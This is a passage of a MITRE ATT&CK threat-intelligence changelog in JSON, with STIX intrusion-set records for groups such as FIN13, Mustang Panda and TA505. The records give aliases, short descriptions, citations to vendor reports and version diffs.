                            "url": "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf"
                        },
                        {
                            "source_name": "DOJ North Korea Indictment Feb 2021",
                            "description": "Department of Justice. (2021, February 17). Three North Korean Military Hackers Indicted in Wide-Ranging Scheme to Commit Cyberattacks and Financial Crimes Across the Globe. Retrieved June 9, 2021.",
                            "url": "https://www.justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and"
                        },
                        {
                            "source_name": "CISA AA20-239A BeagleBoyz August 2020",
                            "description": "DHS/CISA. (2020, August 26). FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks. Retrieved September 29, 2021.",
                            "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-239a"
                        },
                        {
                            "source_name": "FireEye APT38 Oct 2018",
                            "description": "FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 17, 2024.",
                            "url": "https://services.google.com/fh/files/misc/apt38-un-usual-suspects.pdf"
                        },
                        {
                            "source_name": "Kaspersky Lazarus Under The Hood Blog 2017",
                            "description": "GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019.",
                            "url": "https://securelist.com/lazarus-under-the-hood/77908/"
                        },
                        {
                            "source_name": "CrowdStrike Stardust Chollima Profile April 2018",
                            "description": "Meyers, Adam. (2018, April 6). Meet CrowdStrike\u2019s Adversary of the Month for April: STARDUST CHOLLIMA. Retrieved September 29, 2021.",
                            "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-april-stardust-chollima/"
                        },
                        {
                            "source_name": "Microsoft Threat Actor Naming July 2023",
                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
                        },
                        {
                            "source_name": "SecureWorks NICKEL GLADSTONE profile Sept 2021",
                            "description": "SecureWorks. (2021, September 29). NICKEL GLADSTONE Threat Profile. Retrieved September 29, 2021.",
                            "url": "https://www.secureworks.com/research/threat-profiles/nickel-gladstone"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Hiroki Nagahama, NEC Corporation",
                        "Manikantan Srinivasan, NEC Corporation India",
                        "Pooja Natarajan, NEC Corporation India"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack",
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-11-13 19:21:05.133000+00:00\", \"old_value\": \"2025-01-22 21:54:11.727000+00:00\"}, \"root['external_references'][11]['url']\": {\"new_value\": \"https://services.google.com/fh/files/misc/apt38-un-usual-suspects.pdf\", \"old_value\": \"https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "3.1"
                },
                {
                    "type": "intrusion-set",
                    "spec_version": "2.1",
                    "id": "intrusion-set--fd66436e-4d33-450e-ac4c-f7810f1c85f4",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2023-07-27 15:24:02.162000+00:00",
                    "modified": "2026-01-20 15:10:22.473000+00:00",
                    "name": "FIN13",
                    "description": "[FIN13](https://attack.mitre.org/groups/G1016) is a financially motivated cyber threat group that has targeted the financial, retail, and hospitality industries in Mexico and Latin America, as early as 2016. [FIN13](https://attack.mitre.org/groups/G1016) achieves its objectives by stealing intellectual property, financial data, mergers and acquisition information, or PII.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022)",
                    "aliases": [
                        "FIN13",
                        "Elephant Beetle"
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/groups/G1016",
                            "external_id": "G1016"
                        },
                        {
                            "source_name": "Elephant Beetle",
                            "description": "(Citation: Sygnia Elephant Beetle Jan 2022)"
                        },
                        {
                            "source_name": "Sygnia Elephant Beetle Jan 2022",
                            "description": "Sygnia Incident Response Team. (2022, January 5). TG2003: ELEPHANT BEETLE UNCOVERING AN ORGANIZED FINANCIAL-THEFT OPERATION. Retrieved February 9, 2023.",
                            "url": "https://web.archive.org/web/20220105132433/https://f.hubspotusercontent30.net/hubfs/8776530/Sygnia-%20Elephant%20Beetle_Jan2022.pdf"
                        },
                        {
                            "source_name": "Mandiant FIN13 Aug 2022",
                            "description": "Ta, V., et al. (2022, August 8). FIN13: A Cybercriminal Threat Actor Focused on Mexico. Retrieved February 9, 2023.",
                            "url": "https://www.mandiant.com/resources/blog/fin13-cybercriminal-mexico"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Oren Biderman, Sygnia",
                        "Noam Lifshitz, Sygnia"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-20 15:10:22.473000+00:00\", \"old_value\": \"2023-09-29 19:08:47.861000+00:00\"}, \"root['external_references'][2]['url']\": {\"new_value\": \"https://web.archive.org/web/20220105132433/https://f.hubspotusercontent30.net/hubfs/8776530/Sygnia-%20Elephant%20Beetle_Jan2022.pdf\", \"old_value\": \"https://f.hubspotusercontent30.net/hubfs/8776530/Sygnia-%20Elephant%20Beetle_Jan2022.pdf?__hstc=147695848.3e8f1a482c8f8d4531507747318e660b.1680005306711.1680005306711.1680005306711.1&__hssc=147695848.1.1680005306711&__hsfp=3000179024&hsCtaTracking=189ec409-ae2d-4909-8bf1-62dcdd694372%7Cca91d317-8f10-4a38-9f80-367f551ad64d\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "1.0"
                },
                {
                    "type": "intrusion-set",
                    "spec_version": "2.1",
                    "id": "intrusion-set--420ac20b-f2b9-42b8-aa1a-6d4b72895ca4",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-04-12 15:56:28.861000+00:00",
                    "modified": "2026-04-19 00:11:03.898000+00:00",
                    "name": "Mustang Panda",
                    "description": "[Mustang Panda](https://attack.mitre.org/groups/G0129) is a China-based cyber espionage threat actor that has been conducting operations since at least 2012. [Mustang Panda](https://attack.mitre.org/groups/G0129) has been known to use tailored phishing lures and decoy documents to deliver malicious payloads.  [Mustang Panda](https://attack.mitre.org/groups/G0129) has targeted government, diplomatic, and non-governmental organizations, including think tanks, religious institutions, and research entities, across the United States, Europe, and Asia, with notable activity in Russia, Mongolia, Myanmar, Pakistan, and Vietnam. (Citation: BlackBerry MUSTANG PANDA October 2022)(Citation: Eset PlugX Korplug Mustang Panda March 2022)(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Cisco Talos MUSTANG PANDA PLUGX PUBLOAD MAY 2022)(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: DOJ Affidavit Search and Seizure PlugX December 2024)(Citation: EclecticIQ Mustang Panda PlugX)(Citation: ATTACKIQ MUSTANG PANDA TONESHELL March 2023)(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Palo Alto Networks, Unit 42)(Citation: Sophos PlugX September 2022)(Citation: Sophos Mustang Panda PLUGX)(Citation: Zscaler)",
                    "aliases": [
                        "Mustang Panda",
                        "TA416",
                        "RedDelta",
                        "BRONZE PRESIDENT",
                        "STATELY TAURUS",
                        "FIREANT",
                        "CAMARO DRAGON",
                        "EARTH PRETA",
                        "HIVE0154",
                        "TWILL TYPHOON",
                        "TANTALUM",
                        "LUMINOUS MOTH",
                        "UNC6384",
                        "TEMP.Hex",
                        "Red Lich",
                        "ClumsyToad"
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/groups/G0129",
                            "external_id": "G0129"
                        },
                        {
                            "source_name": "Cloudflare 2026 Threat Report New Threat Actors March 2026",
                            "description": " Cloudflare. (2026, March 3). Introducing the 2026 Cloudflare Threat Report. Retrieved April 18, 2026.",
                            "url": "https://blog.cloudflare.com/2026-threat-report/"
                        },
                        {
                            "source_name": "EARTH PRETA",
                            "description": "(Citation: 2022 November_TrendMicro_Earth Preta_Toneshell_Pubload)(Citation: Trend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024)(Citation: Trend Micro Mustang Panda Earth Preta Toneshell February 2025)(Citation: Trend Micro Mustang Panda Earth Preta TONESHELL June 2023)"
                        },
                        {
                            "source_name": "FIREANT",
                            "description": "(Citation: Broadcom)"
                        },
                        {
                            "source_name": "ClumsyToad",
                            "description": "(Citation: Cloudflare 2026 Threat Report New Threat Actors March 2026)"
                        },
                        {
                            "source_name": "Mustang Panda",
                            "description": "(Citation: Crowdstrike MUSTANG PANDA June 2018)"
                        },
                        {
                            "source_name": "UNC6384",
                            "description": "(Citation: Google Threat Intelligence Group MUSTANG PANDA PLUGX August 2025)"
                        },
                        {
                            "source_name": "TEMP.Hex",
                            "description": "(Citation: Google Threat Intelligence Group MUSTANG PANDA PLUGX August 2025)"
                        },
                        {
                            "source_name": "CAMARO DRAGON",
                            "description": "(Citation: HorseShell)"
                        },
                        {
                            "source_name": "HIVE0154",
                            "description": "(Citation: IBM MUSTANG PANDA PUBLOAD CLAIMLOADER JUNE 2025)(Citation: 2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDA)"
                        },
                        {
                            "source_name": "TWILL TYPHOON",
                            "description": "(Citation: Microsoft Naming Conventions Frequently Updated)"
                        },
                        {
                            "source_name": "TANTALUM",
                            "description": "(Citation: Microsoft Naming Conventions Frequently Updated)"
                        },
                        {
                            "source_name": "LUMINOUS MOTH",
                            "description": "(Citation: Microsoft Naming Conventions Frequently Updated)"
                        },
                        {
                            "source_name": "STATELY TAURUS",
                            "description": "(Citation: Palo Alto Networks, Unit 42)(Citation: Unit42 Bookworm Nov2015)(Citation: Unit42 Chinese VSCode 06 September 2024)(Citation: Broadcom)(Citation: Palo Alto Unit42 STATELY TAURUS TONESHELL September 2023)(Citation: CSIRT CTI MUSTANG PANDA PUBLOAD TONESHELL JAN 2024)"
                        },
                        {
                            "source_name": "TA416",
                            "description": "(Citation: Proofpoint TA416 November 2020)"
                        },
                        {
                            "source_name": "Red Lich",
                            "description": "(Citation: PWC UK MUSTANG PANDA RED LICH February 2021)"
                        },
                        {
                            "source_name": "RedDelta",
                            "description": "(Citation: Recorded Future REDDELTA July 2020)(Citation: Proofpoint TA416 Europe March 2022)"
                        },
                        {
                            "source_name": "BRONZE PRESIDENT",
                            "description": "(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Sophos PlugX September 2022)(Citation: Sophos Mustang Panda PLUGX)"
                        },
                        {
                            "source_name": "Eset PlugX Korplug Mustang Panda March 2022",
                            "description": "Alexandre Cote Cyr. (2022, March 23). Mustang Panda\u2019s Hodur: Old tricks, new Korplug variant. Retrieved September 9, 2025.",
                            "url": "https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/"
                        },
                        {
                            "source_name": "Anomali MUSTANG PANDA October 2019",
                            "description": "Anomali Threat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021.",
                            "url": "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations"
                        },
                        {
                            "source_name": "Cisco Talos MUSTANG PANDA PLUGX PUBLOAD MAY 2022",
                            "description": "Asheer Malhotra, Jungsoo An, Kendall Mc. (2022, May 5). Mustang Panda deploys a new wave of malware targeting Europe. Retrieved August 4, 2025.",
                            "url": "https://blog.talosintelligence.com/mustang-panda-targets-europe/"
                        },
                        {
                            "source_name": "Broadcom",
                            "description": "Broadcom Protection Bulletins. (2025, February 20). Bookworm malware linked to Fireant (aka Stately Tarurus) activity observed in Southeast Asia. Retrieved July 21, 2025.",
                            "url": "https://www.broadcom.com/support/security-center/protection-bulletin/bookworm-malware-linked-to-fireant-aka-stately-tarurus-activity-observed-in-southeast-asia"
                        },
                        {
                            "source_name": "HorseShell",
                            "description": "Cohen, Itay. Madej, Radoslaw. Threat Intelligence Team. (2023, May 16). THE DRAGON WHO SOLD HIS CAMARO: ANALYZING CUSTOM ROUTER IMPLANT. Retrieved December 26, 2023.",
                            "url": "https://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/"
                        },
                        {
                            "source_name": "Secureworks BRONZE PRESIDENT December 2019",
                            "description": "Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021.",
                            "url": "https://www.secureworks.com/research/bronze-president-targets-ngos"
                        },
                        {
                            "source_name": "CSIRT CTI MUSTANG PANDA PUBLOAD TONESHELL JAN 2024",
                            "description": "CSIRT CTI. (2024, January 23). Stately Taurus Targets Myanmar Amidst Concerns over Military Junta\u2019s Handling of Rebel Attacks. Retrieved August 4, 2025.",
                            "url": "https://csirt-cti.net/2024/01/23/stately-taurus-targets-myanmar/"
                        },
                        {
                            "source_name": "DOJ Affidavit Search and Seizure PlugX December 2024",
                            "description": "DOJ. (2024, December 20). Mag. No. 24-mj-1387 AFFIDAVIT IN SUPPORT OF AN APPLICATION  FOR A NINTH SEARCH AND SEIZURE WARRANT- IN THE MATTER OF THE SEARCH AND  SEIZURE OF COMPUTERS IN THE  UNITED STATES INFECTED WITH  PLUGX MALWARE . Retrieved September 9, 2025.",
                            "url": "https://www.justice.gov/archives/opa/media/1384136/dl"
                        },
                        {
                            "source_name": "EclecticIQ Mustang Panda PlugX",
                            "description": "EclecticIQ Threat Research Team. (2023, February 2). Mustang Panda APT Group Uses European Commission-Themed Lure to Deliver PlugX Malware. Retrieved September 9, 2025.",
                            "url": "https://blog.eclecticiq.com/mustang-panda-apt-group-uses-european-commission-themed-lure-to-deliver-plugx-malware"
                        },
                        {
                            "source_name": "IBM MUSTANG PANDA PUBLOAD CLAIMLOADER JUNE 2025",
                            "description": "Golo Muhr, Joshua Chung. (2025, June 23). Hive0154 aka Mustang Panda shifts focus on Tibetan community to deploy Pubload backdoor. Retrieved August 4, 2025.",
                            "url": "https://www.ibm.com/think/x-force/hive0154-mustang-panda-shifts-focus-tibetan-community-deploy-pubload-backdoor"
                        },
                        {
                            "source_name": "2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDA",
                            "description": "Golo Muhr, Joshua Chung. (2025, May 15). Hive0154 targeting US, Philippines, Pakistan and Taiwan in suspected espionage campaign. Retrieved August 4, 2025.",
                            "url": "https://www.ibm.com/think/x-force/hive0154-targeting-us-philippines-pakistan-taiwan"
                        },
                        {
                            "source_name": "Recorded Future REDDELTA July 2020",
                            "description": "Insikt Group. (2020, July 28). CHINESE STATE-SPONSORED GROUP \u2018REDDELTA\u2019 TARGETS THE VATICAN AND CATHOLIC ORGANIZATIONS. Retrieved April 13, 2021.",
                            "url": "https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf"
                        },
                        {
                            "source_name": "ATTACKIQ MUSTANG PANDA TONESHELL March 2023",
                            "description": "Ken Towne, Francis Guibernau. (2023, March 23). Emulating the Politically Motivated Chinese APT Mustang Panda. Retrieved September 10, 2025.",
                            "url": "https://www.attackiq.com/2023/03/23/emulating-the-politically-motivated-chinese-apt-mustang-panda/"
                        },
                        {
                            "source_name": "Trend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024",
                            "description": "Lenart Bermejo, Sunny Lu, Ted Lee. (2024, September 9). Earth Preta Evolves its Attacks with New Malware and Strategies. Retrieved August 4, 2025.",
                            "url": "https://www.trendmicro.com/en_us/research/24/i/earth-preta-new-malware-and-strategies.html"
                        },
                        {
                            "source_name": "Palo Alto Unit42 STATELY TAURUS TONESHELL September 2023",
                            "description": "Lior Rochberger, Tom Fakterman, Robert Falcone. (2023, September 22). Cyberespionage Attacks Against Southeast Asian Government Linked to Stately Taurus, Aka Mustang Panda. Retrieved September 9, 2025.",
                            "url": "https://unit42.paloaltonetworks.com/stately-taurus-attacks-se-asian-government/"
                        },
                        {
                            "source_name": "Crowdstrike MUSTANG PANDA June 2018",
                            "description": "Meyers, A. (2018, June 15). Meet CrowdStrike\u2019s Adversary of the Month for June: MUSTANG PANDA. Retrieved April 12, 2021.",
                            "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/"
                        },
                        {
                            "source_name": "Microsoft Naming Conventions Frequently Updated",
                            "description": "Microsoft. (2025, September 8). How Microsoft names threat actors. Retrieved September 10, 2025.",
                            "url": "https://learn.microsoft.com/en-us/unified-secops-platform/microsoft-threat-actor-naming"
                        },
                        {
                            "source_name": "Trend Micro Mustang Panda Earth Preta Toneshell February 2025",
                            "description": "Nathaniel Morales, Nick Dai. (2025, February 18). Earth Preta Mixes Legitimate and Malicious Components to Sidestep Detection. Retrieved September 10, 2025.",
                            "url": "https://www.trendmicro.com/en_us/research/25/b/earth-preta-mixes-legitimate-and-malicious-components-to-sidestep-detection.html"
                        },
                        {
                            "source_name": "2022 November_TrendMicro_Earth Preta_Toneshell_Pubload",
                            "description": "Nick Dai, Vickie Su, Sunny Lu. (2022, November 18). Earth Preta Spear-Phishing Governments Worldwide. Retrieved August 4, 2025.",
                            "url": "https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html"
                        },
                        {
                            "source_name": "Google Threat Intelligence Group MUSTANG PANDA PLUGX August 2025",
                            "description": "Patrick Whitsell. (2025, August 25). Deception in Depth: PRC-Nexus Espionage Campaign Hijacks Web Traffic to Target Diplomats. Retrieved September 9, 2025.",
                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/prc-nexus-espionage-targets-diplomats"
                        },
                        {
                            "source_name": "Proofpoint TA416 November 2020",
                            "description": "Proofpoint Threat Research Team. (2020, November 23). TA416 Goes to Ground and Returns with a Golang PlugX Malware Loader. Retrieved April 13, 2021.",
                            "url": "https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader"
                        },
                        {
                            "source_name": "PWC UK MUSTANG PANDA RED LICH February 2021",
                            "description": "PWC UK. (2021, February 28). Cyber Threats 2020: A Year in Retrospect. Retrieved October 15, 2025.",
                            "url": "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
                        },
                        {
                            "source_name": "Proofpoint TA416 Europe March 2022",
                            "description": "Raggi, M. et al. (2022, March 7). The Good, the Bad, and the Web Bug: TA416 Increases Operational Tempo Against European Governments as Conflict in Ukraine Escalates. Retrieved March 16, 2022.",
                            "url": "https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european"
                        },
                        {
                            "source_name": "Unit42 Bookworm Nov2015",
                            "description": "Robert Falcone, Mike Scott, Juan Cortes. (2015, November 10). Bookworm Trojan: A Model of Modular Architecture. Retrieved July 21, 2025.",
                            "url": "https://unit42.paloaltonetworks.com/bookworm-trojan-a-model-of-modular-architecture/"
                        },
                        {
                            "source_name": "Palo Alto Networks, Unit 42",
                            "description": "Robert Falcone. (2025, February 20). Stately Taurus Activity in Southeast Asia Links to Bookworm Malware. Retrieved July 21, 2025.",
                            "url": "https://unit42.paloaltonetworks.com/stately-taurus-uses-bookworm-malware/"
                        },
                        {
                            "source_name": "Sophos PlugX September 2022",
                            "description": "Secureworks Counter Threat Unit Research Team. (2022, April 27). BRONZE PRESIDENT Targets Russian Speakers with Updated PlugX. Retrieved September 9, 2025.",
                            "url": "https://www.secureworks.com/blog/bronze-president-targets-russian-speakers-with-updated-plugx"
                        },
                        {
                            "source_name": "Sophos Mustang Panda PLUGX",
                            "description": "Secureworks Counter Threat Unit Research Team. (2022, September 8). BRONZE PRESIDENT Targets Government Officials. Retrieved September 9, 2025.",
                            "url": "https://www.secureworks.com/blog/bronze-president-targets-government-officials"
                        },
                        {
                            "source_name": "Zscaler",
                            "description": "Sudeep Singh. (2025, April 16). Latest Mustang Panda Arsenal: ToneShell and StarProxy | P1. Retrieved July 21, 2025.",
                            "url": "https://www.zscaler.com/blogs/security-research/latest-mustang-panda-arsenal-toneshell-and-starproxy-p1"
                        },
                        {
                            "source_name": "Trend Micro Mustang Panda Earth Preta TONESHELL June 2023",
                            "description": "Sunny Lu, Vickie Su, Nick Dai. (2023, June 14). Behind the Scenes: Unveiling the Hidden Workings of Earth Preta. Retrieved September 10, 2025.",
                            "url": "https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html"
                        },
                        {
                            "source_name": "BlackBerry MUSTANG PANDA October 2022",
                            "description": "The BlackBerry Research and Intelligence Team. (2022, October 6). Mustang Panda Abuses Legitimate Apps to Target Myanmar Based Victims. Retrieved October 14, 2025.",
                            "url": "https://blogs.blackberry.com/en/2022/10/mustang-panda-abuses-legitimate-apps-to-target-myanmar-based-victims"
                        },
                        {
                            "source_name": "Unit42 Chinese VSCode 06 September 2024",
                            "description": "Tom Fakterman. (2024, September 6). Chinese APT Abuses VSCode to Target Government in Asia. Retrieved March 24, 2025.",
                            "url": "https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Kyaw Pyiyt Htet, @KyawPyiytHtet",
                        "Jiraput Thamsongkrah",
                        "ZScaler ThreatLabz"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-19 00:11:03.898000+00:00\", \"old_value\": \"2025-11-04 19:40:42.270000+00:00\"}}, \"iterable_item_added\": {\"root['aliases'][15]\": \"ClumsyToad\", \"root['external_references'][1]\": {\"source_name\": \"Cloudflare 2026 Threat Report New Threat Actors March 2026\", \"description\": \" Cloudflare. (2026, March 3). Introducing the 2026 Cloudflare Threat Report. Retrieved April 18, 2026.\", \"url\": \"https://blog.cloudflare.com/2026-threat-report/\"}, \"root['external_references'][4]\": {\"source_name\": \"ClumsyToad\", \"description\": \"(Citation: Cloudflare 2026 Threat Report New Threat Actors March 2026)\"}}}",
                    "previous_version": "3.0"
                },
                {
                    "type": "intrusion-set",
                    "spec_version": "2.1",
                    "id": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-05-28 15:54:17.213000+00:00",
                    "modified": "2026-01-20 15:50:34.667000+00:00",
                    "name": "TA505",
                    "description": "[TA505](https://attack.mitre.org/groups/G0092) is a cyber criminal group that has been active since at least 2014. [TA505](https://attack.mitre.org/groups/G0092) is known for frequently changing malware, driving global trends in criminal malware distribution, and ransomware campaigns involving [Clop](https://attack.mitre.org/software/S0611).(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: NCC Group TA505)(Citation: Korean FSI TA505 2020)",
                    "aliases": [
                        "TA505",
                        "Hive0065",
                        "Spandex Tempest",
                        "CHIMBORAZO"
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/groups/G0092",
                            "external_id": "G0092"
                        },
                        {
                            "source_name": "Hive0065",
                            "description": "(Citation: IBM TA505 April 2020)"
                        },
                        {
                            "source_name": "Spandex Tempest",
                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
                        },
                        {
                            "source_name": "CHIMBORAZO",
                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
                        },
                        {
                            "source_name": "Korean FSI TA505 2020",
                            "description": "Financial Security Institute. (2020, February 28). Profiling of TA505 Threat Group That Continues to Attack the Financial Sector. Retrieved July 14, 2022.",
                            "url": "https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1382.do?page=1&column=&search=&searchSDate=&searchEDate=&bbsDataCategory="
                        },
                        {
                            "source_name": "IBM TA505 April 2020",
                            "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020.",
                            "url": "https://web.archive.org/web/20200420201624/https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/"
                        },
                        {
                            "source_name": "Microsoft Threat Actor Naming July 2023",
                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
                        },
                        {
                            "source_name": "Proofpoint TA505 Sep 2017",
                            "description": "Proofpoint Staff. (2017, September 27). Threat Actor Profile: TA505, From Dridex to GlobeImposter. Retrieved May 28, 2019.",
                            "url": "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter"
                        },
                        {
                            "source_name": "Proofpoint TA505 June 2018",
                            "description": "Proofpoint Staff. (2018, June 8). TA505 shifts with the times. Retrieved May 28, 2019.",
                            "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-shifts-times"
                        },
                        {
                            "source_name": "Proofpoint TA505 Jan 2019",
                            "description": "Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019.",
                            "url": "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505"
                        },
                        {
                            "source_name": "NCC Group TA505",
                            "description": "Terefos, A. (2020, November 18). TA505: A Brief History of Their Time. Retrieved July 14, 2022.",
                            "url": "https://research.nccgroup.com/2020/11/18/ta505-a-brief-history-of-their-time/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-20 15:50:34.667000+00:00\", \"old_value\": \"2024-04-10 22:37:02.592000+00:00\"}, \"root['external_references'][5]['url']\": {\"new_value\": \"https://web.archive.org/web/20200420201624/https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/\", \"old_value\": \"https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "3.0"
                },
                {
                    "type": "intrusion-set",
                    "spec_version": "2.1",
                    "id": "intrusion-set--d519164e-f5fa-4b8c-a1fb-cf0172ad0983",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-05-31 21:31:59.120000+00:00",
                    "modified": "2026-01-20 16:07:46.964000+00:00",
                    "name": "Threat Group-1314",
                    "description": "[Threat Group-1314](https://attack.mitre.org/groups/G0028) is an unattributed threat group that has used compromised credentials to log into a victim's remote access infrastructure. (Citation: Dell TG-1314)",
                    "aliases": [
                        "Threat Group-1314",
                        "TG-1314"
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/groups/G0028",
                            "external_id": "G0028"
                        },
                        {
                            "source_name": "Threat Group-1314",
                            "description": "(Citation: Dell TG-1314)"
                        },
                        {
                            "source_name": "TG-1314",
                            "description": "(Citation: Dell TG-1314)"
                        },
                        {
                            "source_name": "Dell TG-1314",
                            "description": "Dell SecureWorks Counter Threat Unit Special Operations Team. (2015, May 28). Living off the Land. Retrieved January 26, 2016.",
                            "url": "https://web.archive.org/web/20150626073312/http://www.secureworks.com/resources/blog/living-off-the-land/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
